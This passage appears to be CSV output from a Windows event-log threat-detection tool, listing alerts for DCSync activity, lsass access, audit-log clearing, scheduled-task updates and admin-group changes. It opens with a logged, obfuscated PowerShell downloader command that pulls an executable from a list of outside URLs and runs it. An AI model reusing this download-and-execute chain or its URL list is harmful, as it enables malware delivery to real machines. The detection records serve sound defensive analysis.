(gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1 DetailTotal=1 SequenceNumber=21 UserId=DESKTOP-RIPCLIP\Clippy HostName=ConsoleHost HostVersion=5.1.19041.1 HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe EngineVersion=5.1.19041.1 RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 PipelineId=6 ScriptName= CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Item): "New-Item" ParameterBinding(New-Item): name="ItemType"; value="DIrectOry" ParameterBinding(New-Item): name="Path"; value="C:\Users\Clippy\AppData\Local\Temp\WOrd\2019\" ",DESKTOP-RIPCLIP,Windows PowerShell non-system accounts getting a handle to and accessing lsass,1583705494.340693,2020-03-09T02:11:34.340693+04:00,,Audit,High,Non-system account ( IEUser ) with process ( C:\Windows\System32\cscript.exe ) got access to object ( \Device\HarddiskVolume1\Windows\System32\lsass.exe ) of type ( Process ),4663," 4663 1 0 12802 0 0x8020000000000000 314462 Security MSEDGEWIN10 S-1-5-21-3461203602-4096304019-2269080069-1000 IEUser MSEDGEWIN10 0x33392 Security Process \Device\HarddiskVolume1\Windows\System32\lsass.exe 0x558 %%4484 0x10 0x1688 C:\Windows\System32\cscript.exe - ",MSEDGEWIN10,Security non-system accounts getting a handle to and accessing lsass,1583705494.340584,2020-03-09T02:11:34.340584+04:00,,Audit,High,Non-system account ( IEUser ) with process ( C:\Windows\System32\cscript.exe ) got access to object ( \Device\HarddiskVolume1\Windows\System32\lsass.exe ) of type ( Process ),4656," 4656 1 0 12802 0 0x8020000000000000 314461 Security MSEDGEWIN10 S-1-5-21-3461203602-4096304019-2269080069-1000 IEUser MSEDGEWIN10 0x33392 Security Process \Device\HarddiskVolume1\Windows\System32\lsass.exe 0x558 00000000-0000-0000-0000-000000000000 %%1537 %%1538 %%1539 %%1540 %%1541 %%4480 %%4481 %%4482 %%4483 %%4484 %%4485 %%4486 %%4487 %%4488 %%4489 %%4490 %%4491 %%4492 %%4493 - 0x1f3fff - 0 0x1688 C:\Windows\System32\cscript.exe - ",MSEDGEWIN10,Security Audit log cleared,1556393475.355063,2019-04-27T23:31:15.355063+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102," 1102 0 4 104 0 0x4020000000000000 4987 Security IEWIN7 S-1-5-21-3583694148-1414552638-2922671848-1000 IEUser IEWIN7 0xffa8 ",IEWIN7,Security Audit log cleared,1600198172.174941,2020-09-15T23:29:32.174941+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102," 1102 0 4 104 0 0x4020000000000000 768617 Security 01566s-win16-ir.threebeesco.com S-1-5-21-308926384-506822093-3341789130-1106 a-jbrown 3B 0x4c331 ",01566s-win16-ir.threebeesco.com,Security Dcsync Attack detected,1557281451.611176,2019-05-08T06:10:51.611176+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662," 4662 0 0 14080 0 0x8020000000000000 202793 Security DC1.insecurebank.local S-1-5-21-738609754-2819869699-4189121830-500 Administrator insecurebank 0x40c6511 DS %{19195a5b-6da0-11d0-afd3-00c04fd930c9} %{c6faf700-bfe4-452a-a766-424f84c29583} Object Access 0x0 %%7688 0x100 %%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9} - ",DC1.insecurebank.local,Security Dcsync Attack detected,1557281451.580169,2019-05-08T06:10:51.580169+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662," 4662 0 0 14080 0 0x8020000000000000 202792 Security DC1.insecurebank.local S-1-5-21-738609754-2819869699-4189121830-500 Administrator insecurebank 0x40c6511 DS %{19195a5b-6da0-11d0-afd3-00c04fd930c9} %{c6faf700-bfe4-452a-a766-424f84c29583} Object Access 0x0 %%7688 0x100 %%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9} - ",DC1.insecurebank.local,Security Audit log cleared,1600340264.254575,2020-09-17T14:57:44.254575+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102," 1102 0 4 104 0 0x4020000000000000 769792 Security 01566s-win16-ir.threebeesco.com S-1-5-21-308926384-506822093-3341789130-1106 a-jbrown 3B 0x4c331 ",01566s-win16-ir.threebeesco.com,Security Dcsync Attack detected,1557281443.487217,2019-05-08T06:10:43.487217+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662," 4662 0 0 14080 0 0x8020000000000000 202791 Security DC1.insecurebank.local S-1-5-21-738609754-2819869699-4189121830-500 Administrator insecurebank 0x40c6511 DS %{19195a5b-6da0-11d0-afd3-00c04fd930c9} %{c6faf700-bfe4-452a-a766-424f84c29583} Object Access 0x0 %%7688 0x100 %%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9} - ",DC1.insecurebank.local,Security Audit log cleared,1595449776.414827,2020-07-23T00:29:36.414827+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102," 1102 0 4 104 0 0x4020000000000000 887106 Security 01566s-win16-ir.threebeesco.com S-1-5-21-308926384-506822093-3341789130-1106 a-jbrown 3B 0x3a17a ",01566s-win16-ir.threebeesco.com,Security Process running in Unusual location,1638898381.636384,2021-12-07T21:33:01.636384+04:00,,Threat,High,"User Name : ( MSEDGEWIN10$ ) with process : ( \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe ) run from Unusual location , check the number and date of execution in process execution report",4688," 4688 2 0 13312 0 0x8020000000000000 329919 Security MSEDGEWIN10 S-1-5-18 MSEDGEWIN10$ WORKGROUP 0x3e7 0x17b8 \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe %%1936 0x27c S-1-0-0 IEUser MSEDGEWIN10 0x16e3db3 C:\Windows\System32\lsass.exe S-1-16-12288 ",MSEDGEWIN10,Security schedule task updated,1553518420.276615,2019-03-25T16:53:40.276615+04:00,,Audit,Low,schedule task updated by user,4702," 4702 0 0 12804 0 0x8020000000000000 198239223 Security DC1.insecurebank.local S-1-5-20 DC1$ insecurebank 0x3e4 \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask <?xml version="1.0" encoding="UTF-16"?> <Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source> <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author> <Version>1.0</Version> <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description> <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI> <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor> </RegistrationInfo> <Triggers> <CalendarTrigger> <StartBoundary>2019-03-26T12:51:45Z</StartBoundary> <Enabled>true</Enabled> <ScheduleByDay> <DaysInterval>1</DaysInterval> </ScheduleByDay> </CalendarTrigger> </Triggers> <Principals> <Principal id="NetworkService"> <UserId>S-1-5-20</UserId> <RunLevel>LeastPrivilege</RunLevel> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>true</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT0S</ExecutionTimeLimit> <Priority>7</Priority> <RestartOnFailure> <Interval>PT1M</Interval> <Count>3</Count> </RestartOnFailure> </Settings> <Actions Context="NetworkService"> <ComHandler> <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId> <Data><![CDATA[timer]]></Data> </ComHandler> </Actions> </Task> ",DC1.insecurebank.local,Security Audit log cleared,1645007839.637236,2022-02-16T14:37:19.637236+04:00,,Audit,Critical,Audit log cleared by user ( jbrown ),1102," 1102 0 4 104 0 0x4020000000000000 2988521 Security 01566s-win16-ir.threebeesco.com S-1-5-21-308926384-506822093-3341789130-1105 jbrown 3B 0x1717b6 ",01566s-win16-ir.threebeesco.com,Security User Created through management interface,1600248733.647851,2020-09-16T13:32:13.647851+04:00,,Audit,Medium,User Name ( 01566S-WIN16-IR$ ) Created User Name ( $ ),4720," 4720 0 0 13824 0 0x8020000000000000 769634 Security 01566s-win16-ir.threebeesco.com $ 3B S-1-5-21-308926384-506822093-3341789130-107104 S-1-5-18 01566S-WIN16-IR$ 3B 0x3e7 - $ %%1793 - %%1793 %%1793 %%1793 %%1793 %%1793 %%1794 %%1794 513 - 0x0 0x15 %%2080 %%2082 %%2084 %%1792 - %%1793 ",01566s-win16-ir.threebeesco.com,Security User Created through management interface,1600248679.134161,2020-09-16T13:31:19.134161+04:00,,Audit,Medium,User Name ( 01566S-WIN16-IR$ ) Created User Name ( $ ),4720," 4720 0 0 13824 0 0x8020000000000000 769629 Security 01566s-win16-ir.threebeesco.com $ 3B S-1-5-21-308926384-506822093-3341789130-107103 S-1-5-18 01566S-WIN16-IR$ 3B 0x3e7 - $ %%1793 - %%1793 %%1793 %%1793 %%1793 %%1793 %%1794 %%1794 513 - 0x0 0x15 %%2080 %%2082 %%2084 %%1792 - %%1793 ",01566s-win16-ir.threebeesco.com,Security schedule task updated,1553516620.16764,2019-03-25T16:23:40.167640+04:00,,Audit,Low,schedule task updated by user,4702," 4702 0 0 12804 0 0x8020000000000000 198238969 Security DC1.insecurebank.local S-1-5-20 DC1$ insecurebank 0x3e4 \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask <?xml version="1.0" encoding="UTF-16"?> <Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source> <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author> <Version>1.0</Version> <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description> <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI> <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor> </RegistrationInfo> <Triggers> <CalendarTrigger> <StartBoundary>2019-03-26T12:21:45Z</StartBoundary> <Enabled>true</Enabled> <ScheduleByDay> <DaysInterval>1</DaysInterval> </ScheduleByDay> </CalendarTrigger> </Triggers> <Principals> <Principal id="NetworkService"> <UserId>S-1-5-20</UserId> <RunLevel>LeastPrivilege</RunLevel> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>true</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT0S</ExecutionTimeLimit> <Priority>7</Priority> <RestartOnFailure> <Interval>PT1M</Interval> <Count>3</Count> </RestartOnFailure> </Settings> <Actions Context="NetworkService"> <ComHandler> <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId> <Data><![CDATA[timer]]></Data> </ComHandler> </Actions> </Task> ",DC1.insecurebank.local,Security schedule task updated,1553514820.047682,2019-03-25T15:53:40.047682+04:00,,Audit,Low,schedule task updated by user,4702," 4702 0 0 12804 0 0x8020000000000000 198238774 Security DC1.insecurebank.local S-1-5-20 DC1$ insecurebank 0x3e4 \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask <?xml version="1.0" encoding="UTF-16"?> <Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source> <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author> <Version>1.0</Version> <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description> <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI> <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor> </RegistrationInfo> <Triggers> <CalendarTrigger> <StartBoundary>2019-03-26T11:51:45Z</StartBoundary> <Enabled>true</Enabled> <ScheduleByDay> <DaysInterval>1</DaysInterval> </ScheduleByDay> </CalendarTrigger> </Triggers> <Principals> <Principal id="NetworkService"> <UserId>S-1-5-20</UserId> <RunLevel>LeastPrivilege</RunLevel> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>true</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT0S</ExecutionTimeLimit> <Priority>7</Priority> <RestartOnFailure> <Interval>PT1M</Interval> <Count>3</Count> </RestartOnFailure> </Settings> <Actions Context="NetworkService"> <ComHandler> <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId> <Data><![CDATA[timer]]></Data> </ComHandler> </Actions> </Task> ",DC1.insecurebank.local,Security schedule task updated,1553513019.936605,2019-03-25T15:23:39.936605+04:00,,Audit,Low,schedule task updated by user,4702," 4702 0 0 12804 0 0x8020000000000000 198238563 Security DC1.insecurebank.local S-1-5-20 DC1$ insecurebank 0x3e4 \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask <?xml version="1.0" encoding="UTF-16"?> <Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source> <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author> <Version>1.0</Version> <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description> <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI> <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor> </RegistrationInfo> <Triggers> <CalendarTrigger> <StartBoundary>2019-03-26T11:21:44Z</StartBoundary> <Enabled>true</Enabled> <ScheduleByDay> <DaysInterval>1</DaysInterval> </ScheduleByDay> </CalendarTrigger> </Triggers> <Principals> <Principal id="NetworkService"> <UserId>S-1-5-20</UserId> <RunLevel>LeastPrivilege</RunLevel> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>true</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT0S</ExecutionTimeLimit> <Priority>7</Priority> <RestartOnFailure> <Interval>PT1M</Interval> <Count>3</Count> </RestartOnFailure> </Settings> <Actions Context="NetworkService"> <ComHandler> <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId> <Data><![CDATA[timer]]></Data> </ComHandler> </Actions> </Task> ",DC1.insecurebank.local,Security Audit log cleared,1600879816.697344,2020-09-23T20:50:16.697344+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102," 1102 0 4 104 0 0x4020000000000000 772605 Security 01566s-win16-ir.threebeesco.com S-1-5-21-308926384-506822093-3341789130-500 Administrator 3B 0x7b186 ",01566s-win16-ir.threebeesco.com,Security User added to local group,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,User ( IEUser ) added User ( S-1-5-20 ) to local group ( Administrators ),4732," 4732 0 0 13826 0 0x8020000000000000 191030 Security MSEDGEWIN10 - S-1-5-20 Administrators Builtin S-1-5-32-544 S-1-5-21-3461203602-4096304019-2269080069-1000 IEUser MSEDGEWIN10 0x27a10f - ",MSEDGEWIN10,Security User added to local group,1569151399.251925,2019-09-22T15:23:19.251925+04:00,,Audit,High,User ( IEUser ) added User ( S-1-5-21-3461203602-4096304019-2269080069-501 ) to local group ( Administrators ),4732," 4732 0 0 13826 0 0x8020000000000000 191029 Security MSEDGEWIN10 - S-1-5-21-3461203602-4096304019-2269080069-501 Administrators Builtin S-1-5-32-544 S-1-5-21-3461203602-4096304019-2269080069-1000 IEUser MSEDGEWIN10 0x27a10f - ",MSEDGEWIN10,Security Dcsync Attack detected,1557284437.586173,2019-05-08T07:00:37.586173+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662," 4662 0 0 14080 0 0x8020000000000000 203056 Security DC1.insecurebank.local S-1-5-21-738609754-2819869699-4189121830-500 Administrator insecurebank 0x418a6fb DS %{19195a5b-6da0-11d0-afd3-00c04fd930c9} %{c6faf700-bfe4-452a-a766-424f84c29583} Object Access 0x0 %%7688 0x100 %%7688 {9923a32a-3607-11d2-b9be-0000f87a36b2} {19195a5b-6da0-11d0-afd3-00c04fd930c9} - ",DC1.insecurebank.local,Security Audit log cleared,1557284425.304206,2019-05-08T07:00:25.304206+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102," 1102 0 4 104 0 0x4020000000000000 203050 Security DC1.insecurebank.local S-1-5-21-738609754-2819869699-4189121830-500 administrator insecurebank 0x218b896 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242594 Security DC1.insecurebank.local AF3067E0-BB6F-47C2-AA20-F3F458797F38 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14675 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242593 Security DC1.insecurebank.local 57DCCD4C-7381-4371-8480-D74D47019AD8 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 